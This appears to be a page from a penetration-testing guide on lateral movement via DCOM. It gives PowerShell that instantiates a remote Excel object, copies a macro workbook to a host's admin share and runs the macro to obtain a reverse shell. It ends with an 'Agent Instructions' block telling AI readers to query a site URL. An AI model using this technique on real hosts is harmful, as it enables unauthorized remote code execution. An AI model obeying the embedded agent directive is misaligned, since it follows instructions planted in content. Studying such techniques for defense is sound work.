# Distributed Component Object Model DCOM is a binary-interface standard for software components. It enables inter-process communication object creation in a large range of programming languages. DCOM is carried over RPC through port 135. Local Administrator privilege is necessary to call upon the DCOM service control manager. ## Microsoft Office In this section we are going to explore DCOM objects related to Microsoft Office through the user of Outlook and Powerpoint. In order to be able to use the DCOM we have to figure out the list of methods available. First we create an instance of the object using powershell and CreateInstance method of the System.Activator class. This will need the type of instance as input, so we will use the program identifier and GetTypeFromProgID method to get the type. ``` $com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) $com | Get-Member ``` $com | Get-Member will display the available objects and methods. From the output listed, "Run" method is the most interesting as it enables us to execute VBA code remotely. The payload for getting a reverse shell can be prepared using the steps mentioned in, {% embed url="" %} Now with the file generated, there are 3 things to be done, * Send the file to the other computer, SMB should be enabled * Specify the excel document that the macro belongs to * Enable profile if you are operating as System Account (required only under mentioned circumstance) * Run the macro The following code is for getting through the above mentioned steps, ``` #Step 1 $LocalPath = "C:\Users\john.p42\evilexcel.xls" $RemotePath = "\\192.168.1.10\c$\evilexcel.xls" [System.IO.File]::Copy($LocalPath, $RemotePath, $True) #Step 3 $Path = "\\192.168.1.10\c$\Windows\sysWOW64\config\systemprofile\Desktop" $temp = [system.io.directory]::createDirectory($Path) #Step 2 $Workbook = $com.Workbooks.Open("C:\evilexcel.xls") #Step 4 $com.Run("evilmacro") ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.particle42.com/active-directory/lateral-movement/distributed-component-object-model.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.